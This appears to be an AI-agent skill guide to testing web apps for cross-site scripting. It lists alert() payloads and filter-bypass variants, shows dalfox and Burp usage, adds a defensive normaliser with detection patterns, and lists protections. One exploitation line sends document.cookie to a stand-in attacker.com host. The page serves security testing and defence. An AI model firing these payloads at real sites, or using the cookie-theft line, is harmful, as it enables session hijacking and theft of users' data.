xss-testing


XSS Testing Skills

Overview

Cross-Site Scripting (XSS) lets an attacker execute malicious JavaScript in a victim's browser. This skill covers testing methods for reflected, stored, and DOM-based XSS.

Types of XSS

1. Reflected XSS

  • The malicious script is passed in a URL parameter
  • The server reflects it straight back in the response
  • Requires the victim to open a crafted link

2. Stored XSS

  • The malicious script is persisted on the server (database, file, etc.)
  • Every user who visits the affected page executes it
  • Wider impact than reflected XSS

3. DOM-based XSS

  • Client-side JavaScript handles user input unsafely
  • No server-side processing is involved
  • Triggered by the page's own script modifying the DOM

Testing Methods

Basic Payloads

```html
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
<body onload=alert('XSS')>
```

Bypassing Filters

Case Bypass

```html
<ScRiPt>alert('XSS')</ScRiPt>
```

Encoding Bypass

```text
%3Cscript%3Ealert('XSS')%3C/script%3E
&#60;script&#62;alert('XSS')&#60;/script&#62;
```

Event Handlers

```html
<img src=x onerror=alert(String.fromCharCode(88,83,83))>
<div onmouseover=alert('XSS')>hover</div>
<input onfocus=alert('XSS') autofocus>
```

Pseudo-protocols

```html
<a href="javascript:alert('XSS')">click</a>
<iframe src="javascript:alert('XSS')">
```

Advanced Bypass Techniques

Using String.fromCharCode

```html
<script>alert(String.fromCharCode(88,83,83))</script>
```

Using eval and atob

```html
<script>eval(atob('YWxlcnQoJ1hTUycp'))</script>
```

Using HTML Entities

```text
&#60;script&#62;alert('XSS')&#60;/script&#62;
```
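The case and encoding variants in the Bypassing Filters section, and the eval/atob wrapper above, get past a filter only when that filter matches the raw, undecoded value. The block below is an added example in JavaScript, not code from the original page: a small normaliser of the kind a log-review script or WAF rule would apply, which percent-decodes, decodes HTML entities and lowercases a parameter value before pattern matching, and then compares a naive substring rule with the normalised one over the payloads listed on this page. The `SINK_PATTERNS` list and the `SAMPLES` values are constructed for the demonstration; the patterns are deliberately narrow and are a starting point for a rule, not a complete one.

```javascript
// Added example (not from the original page): normalise a parameter value before
// matching it, so that case changes, percent-encoding, HTML entities and the
// eval(atob(...)) wrapper shown above no longer slip past a literal-string filter.
// The patterns and the sample values are constructed for the demonstration.

const SINK_PATTERNS = [
  /<script\b/,                    // script tag (matched after lowercasing)
  /<[a-z]+[^>]*\son[a-z]+\s*=/,   // inline event handler such as onerror= or onload=
  /javascript:/,                  // javascript: pseudo-protocol in href/src
  /eval\s*\(\s*atob\s*\(/,        // base64-wrapped payload
];

// Decode numeric entities (&#60; &#x3c;) plus the named ones that affect markup.
function decodeHtmlEntities(s) {
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, hex) => String.fromCodePoint(parseInt(hex, 16)))
    .replace(/&#(\d+);?/g, (_, dec) => String.fromCodePoint(parseInt(dec, 10)))
    .replace(/&lt;/gi, '<')
    .replace(/&gt;/gi, '>')
    .replace(/&quot;/gi, '"')
    .replace(/&amp;/gi, '&');
}

// Percent-decode until the value stops changing (bounded), so %253C unwraps to <.
function percentDecode(s, maxRounds = 3) {
  let out = s;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try {
      next = decodeURIComponent(out);
    } catch {
      break;                       // malformed %xx sequence: keep what we have
    }
    if (next === out) break;
    out = next;
  }
  return out;
}

// Canonical form used for matching: decode, lowercase, collapse whitespace.
function normalize(value) {
  return decodeHtmlEntities(percentDecode(value)).toLowerCase().replace(/\s+/g, ' ');
}

// The naive rule: a case-sensitive substring check on the raw value.
function naiveMatch(value) {
  return value.includes('<script');
}

// The normalising rule: decode first, then apply the pattern list.
function normalizedMatch(value) {
  const canonical = normalize(value);
  return SINK_PATTERNS.some((re) => re.test(canonical));
}

// Constructed sample parameter values, mostly taken from the payload lists above.
const SAMPLES = [
  "<script>alert('XSS')</script>",
  "<ScRiPt>alert('XSS')</ScRiPt>",
  "%3Cscript%3Ealert('XSS')%3C/script%3E",
  "&#60;script&#62;alert('XSS')&#60;/script&#62;",
  "<img src=x onerror=alert(String.fromCharCode(88,83,83))>",
  "<a href=\"javascript:alert('XSS')\">click</a>",
  "<script>eval(atob('YWxlcnQoJ1hTUycp'))</script>",
  "plain search term",
];

// Run both rules over every sample and report which one fires.
function classify(samples) {
  return samples.map((value) => ({
    value,
    naive: naiveMatch(value),
    normalized: normalizedMatch(value),
  }));
}

for (const row of classify(SAMPLES)) {
  console.log(`${row.naive ? 'naive:HIT ' : 'naive:miss'} ${row.normalized ? 'norm:HIT ' : 'norm:miss'} ${row.value}`);
}
```

Only the first and the last-but-one sample trip the naive rule; every encoded or case-varied sample trips the normalised one, while the plain search term trips neither. Decoding is bounded and stops on malformed input so that a value containing a stray `%` cannot make the rule throw and silently skip the request.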

Tool Usage

dalfox


Basic scan

Specify parameters

```bash
dalfox url "http://target.com/page" -d "q=test" -X POST
```

Use custom payloads

```bash
dalfox url "http://target.com/page?q=test" --custom-payload payloads.txt
```

Burp Suite

  • Use the Intruder module for batch testing
  • Use Repeater for manual testing
  • Use Scanner for automated detection

Browser Console

  • Test DOM-based XSS
  • Inspect the JavaScript execution context
  • Debug payloads

Verification and Exploitation

Verification Steps

  1. Confirm that the payload executes
  2. Check whether it is filtered or encoded
  3. Test the different contexts (HTML body, JavaScript, attributes, etc.)
  4. Assess the impact (cookie theft, session hijacking, etc.)

Exploitation Scenarios

  • Cookie theft:
    <script>document.location='http://attacker.com/steal?cookie='+document.cookie</script>
  • Keylogging: inject a keyboard event listener
  • Phishing: forge a login form
  • Session hijacking: obtain the user's session token

Key Points for the Report

  • XSS type (reflected/stored/DOM)
  • Trigger location and parameter
  • Complete proof of concept
  • Impact assessment
  • Remediation recommendations (output encoding, CSP, etc.)

Protection Measures

  • Input validation and filtering
  • Output encoding (HTML, JavaScript, URL)
  • Content Security Policy (CSP)
  • HttpOnly flag on cookies
  • Use secure frameworks and libraries